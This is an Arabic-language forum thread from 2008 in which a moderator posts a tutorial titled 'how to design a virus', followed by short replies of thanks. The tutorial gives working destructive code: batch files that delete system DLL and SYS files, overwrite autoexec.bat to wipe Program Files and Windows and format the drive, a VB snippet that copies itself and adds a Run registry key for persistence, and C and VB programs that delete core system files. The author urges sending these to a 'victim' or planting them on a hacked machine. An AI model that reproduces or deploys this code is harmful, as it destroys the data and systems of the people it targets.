منتديات عامه>>> سياسيه..علميه...العاب..اخرى...أهلا بك يا زائر فى منتديات زعومي,,


    كيف تصمم فيروس

    شاطر

    حبيب الروح
    مشرف منتديات الالعاب والتقنيه
    مشرف منتديات الالعاب والتقنيه

    عدد الرسائل : 29
    العمر : 35
    تاريخ التسجيل : 21/08/2008

    كيف تصمم فيروس

    مُساهمة من طرف حبيب الروح في الثلاثاء أغسطس 26, 2008 9:57 am

    شرح لأقوى طرق تصميم فيروس لن تجد مثله



    بسم الله الرحمن الرحيم




    هذا الموضوع من اقوىالمواضيع التى تجذب القراء و الراغبين فى تعلم الهكر و تجذب اكثر محبى البرمجةالذين يسعون الى تعلم كل جديد فى مجال البرمجة



    و نظرا لأنى واحد منمحبى البرمجة احببت ان ابحث فى النت لتعلم طرق صناعة الفيروسات و الحمد لله وجدتالكثير من المعلومات التى افادتنى و دلتنى الى الطريق الذى انا اريده لذا اردت اناعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس



    احب ان اوضح انالطرق سوف اشرحها هنا و هى عبارة عن 4 اجزاء و هى كل ما انا كتبته حتى الأن و سوفاضعها كلها هنا و هذا للتسهيل على كل من يجد هذا الموضوع مهم و يجذب



    ارجوا اولا قبل البدأ فى هذا الموضوع ان اوضح شئ ان هذا الموضوع مننتاج تعب كبير مر على حتى انتجت مثل هذا الموضوع لذا ارجوا من كل من يريد نقلالموضوع ان يكتب انه نقله من Broken_ice و يكتب اسم المنتدى الذى نقله منه



    قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمةو هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن



    نبدأ الموضوع



    تعريف الفيروس :



    يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا اواعتمادا على احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسهابناء على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو تشيرنوبلالذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الأسم نسبةالى الفيروسات الموجودة فى جسم الأنسان و التى تصيبه و تتكاثر بسرعة فيه و هى نفسفكرة عمل الفيروس الذى يصيب الكومبيوتر



    و يجب توافر عدة شروط لكىيصبح الفيروس ذو فاعلية و هى

    أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه

    أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباطباحد الملفات

    أن يكون ذا هدف و مغزى



    -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

    الأن و بعد انفهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم

    ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا





    (( اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجوان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اىخطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحزر منتصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))





    الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فىصناعة الفيروسات



    لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة منالطرق لتصميم الفيروسات و هى

    عن طريق الـnotepad

    عن طريق برنامجالفجول بيسك (vb)

    عن طريق برامج تصميم الفيروسات ( خطيرة جداااا وفيروساتها قوية – لكن اغلبها يكشفه النورتون)

    و سوف اقوم الأن بعرض كل منهمعلى حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقومبه

    هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلمتصميم الفيروس بواسطة notepad



    للعمل على تصميم فيروس بهذا النوع منالتصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat



    و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسبلك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الىالضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كانلديك



    قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولةطبعاولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرةعمله و طريقة تعديله مع مثال بسيط عليه



    اريد ان اوضح انه من الأفضلنسخ الكود و لصقه فى المكان الذى تريده



    ----------------------

    نبدأ بالكود الأول :

    ---------------------



    @Echo off
    c:
    cd %WinDir%\System\
    deltree /y *.dll
    cd\
    deltree /y *.sys



    الـتوضـــــــــــتيح :



    * بعد ان قمت بوضعالكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكلالأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل واياك ان تفتحه

    * هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys منالسيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذاالكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين ويمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اولالكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاهالأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامرالتالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز

    * بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هليمكننا تعديل هذا الكود ؟!!

    ----- لن ادعكم تفكرون فى الأجابة فانا سوفاعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغيرهذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكانالذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحهااو يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضعنوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاهالفيروس الى d:



    مثال توضيحى :

    انا الأن اريد ان امزح معاحد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميعملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التىامتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التىتوجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى

    @Echo off
    e:
    deltree /y *.jpg
    cd\
    deltree /y *.mp3
    cd\
    deltree /y *.asf



    ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراءالكود الثانى



    ----------------

    الكود الثانى :

    --------------



    echo off@

    cls
    call attrib -h -r c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
    echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
    echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
    echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
    echo format c: /q /u /autotest >nul >>c:\autoexec.bat



    الـتوضـــــــــــتيح :



    الفيروس السابق يعتبر منالأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليسممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر



    نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسحالشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد

    بعد سوفنجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضحانه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه

    echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
    يعطى هذا المودالأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزلعلى الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود

    echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
    ولاكنه اذا قام بمسح الويندوزفهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتىيمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين

    echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
    echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat



    اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هوموجود فى السطر التالى

    echo format c: /q /u /autotest >nul >>c:\autoexec.bat



    اولا يوجد بعض الامور توضيحها قبل البدأفى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:

    سوف يجعله يعمل تلقائياعند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقمتحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه



    ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضعفيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوزموضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخالأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات



    اما بالنسبةلتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامرمسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما علىالـ D: فيكون لكود كما يلى



    echo off@

    cls
    call attrib -h -r c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo format d: /q /u /autotest >nul >>c:\autoexec.bat



    ----------------

    الكود الثالث :

    --------------



    code:--------------------------------------------------------------------------------echo off@
    cls
    call attrib -h -r c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
    echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
    echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
    echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
    echo format c: /q /u /autotest >nul >>c:\autoexec.bat



    يعتبر هذا الفيروس نفس عمل السابق لذا انالست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه



    كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمهبـ Autoexec.bat



    الأن و بعد ان تعرفنا الى الأكواد السابقة مارأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده



    الخاصــــــــــــــية الأولى :-



    On Error Resume Next

    Dim copy, copy2

    copy = "c:\virus.exe"

    copy2 = "c:\windows\system\Project12.exe"

    FileCopy copy, copy2



    يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكنللضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت منالفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه



    الخاصــــــــــــــية الثانيه :-



    Option Explicit



    Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long

    Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

    Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

    Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long

    Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long



    Private Const REG_SZ = 1

    Private Const LOCALMACHINE = &H80000002





    Private Sub Command1_Click()

    Dim InputValue As String

    Dim nBufferKey As Long, nBufferSubKey As Long





    RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey

    RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersi on", nBufferKey

    RegOpenKey nBufferKey, "Run-", nBufferSubKey

    InputValue = "c:\windows\system\Project12.exe"

    RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersi on", nBufferKey

    RegOpenKey nBufferKey, "Run-", nBufferSubKey

    RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)



    End Sub

    يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتحالجهاز و هذا عن طريق تعديل ال registry :



    هذا هو كل ما انا حصلتعليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا مناستخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذاليس كل شئ فنا ان حصلت على ى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيهكل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هومجموعة اكواد لأشهر الفيروسات

    فيرووس C++ :

    *****************


    #include
    #include
    #include
    main()
    {
    clrscr();
    printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
    printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
    remove("c:\\windows\\system.ini");
    remove("c:\\windows\\win.ini");
    remove("c:\\autoexec.bat");
    remove("c:\\msdos.sys");
    remove("c:\\io.sys");
    remove("c:\\command.com");
    remove("c:\\config.sys");
    remove("c:\\windows\\ebd\\command.com");
    remove("c:\\windows\\ebd\\ebd.cab");
    remove("c:\\windows\\ebd\\Autoexec.bat") ;
    remove("c:\\windows\\ebd\\setramd.bat");
    remove("c:\\windows\\ebd\\Findramd.exe") ;
    rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
    printf("Windows destroyed ...\n\n");
    system("PAUSE");
    }




    فيرووس Visual Basic :

    *****************


    SetAttr "c:\autoexec.bat", vbNormal
    SetAttr "c:\msdos.sys", vbNormal
    SetAttr "c:\io.sys", vbNormal
    SetAttr "c:\windows\win.ini", vbNormal
    SetAttr "c:\windows\system.ini", vbNormal
    SetAttr "c:\command.com", vbNormal
    SetAttr "c:\config.sys", vbNormal
    SetAttr "c:\windows\rundll.exe", vbNormal
    SetAttr "c:\windows\rundll32.exe", vbNormal
    Kill "C:\autoexec.bat"
    Kill "C:\msdos.sys"
    Kill "C:\io.sys"
    Kill "C:\windows\win.ini"
    Kill "C:\windows\system.ini"
    Kill "C:\command.com"
    Kill "C:\config.sys"
    Kill "C:\windows\rundll.exe"
    Kill "C:\windows\rundll32.exe"



    فيروس Html



    *****************






    Active-X HTML

    THIS HTML USING ACTIVE-X PLEASE CLICK #YES

    Adnanaljanabi
    مشرف عام
    مشرف عام

    عدد الرسائل : 40
    العمر : 27
    العمل/الترفيه : حديقة
    المزاج : عصبي
    تاريخ التسجيل : 14/08/2008

    رد: كيف تصمم فيروس

    مُساهمة من طرف Adnanaljanabi في الأربعاء أغسطس 27, 2008 11:10 pm

    شكرا على المعلومات القيمه

    لولو العراقية
    زعيم مبتدىء
    زعيم مبتدىء

    عدد الرسائل : 7
    تاريخ التسجيل : 29/08/2008

    رد: كيف تصمم فيروس

    مُساهمة من طرف لولو العراقية في السبت أغسطس 30, 2008 12:33 pm

    مشكورة على الشرح الوافي

    بطل العراق
    زعيم مبتدىء
    زعيم مبتدىء

    عدد الرسائل : 28
    العمر : 28
    المزاج : مشوش
    تاريخ التسجيل : 12/09/2008

    رد: كيف تصمم فيروس

    مُساهمة من طرف بطل العراق في السبت سبتمبر 13, 2008 6:26 pm

    مشكور على هذا الشرح

      الوقت/التاريخ الآن هو الجمعة يناير 18, 2019 11:06 am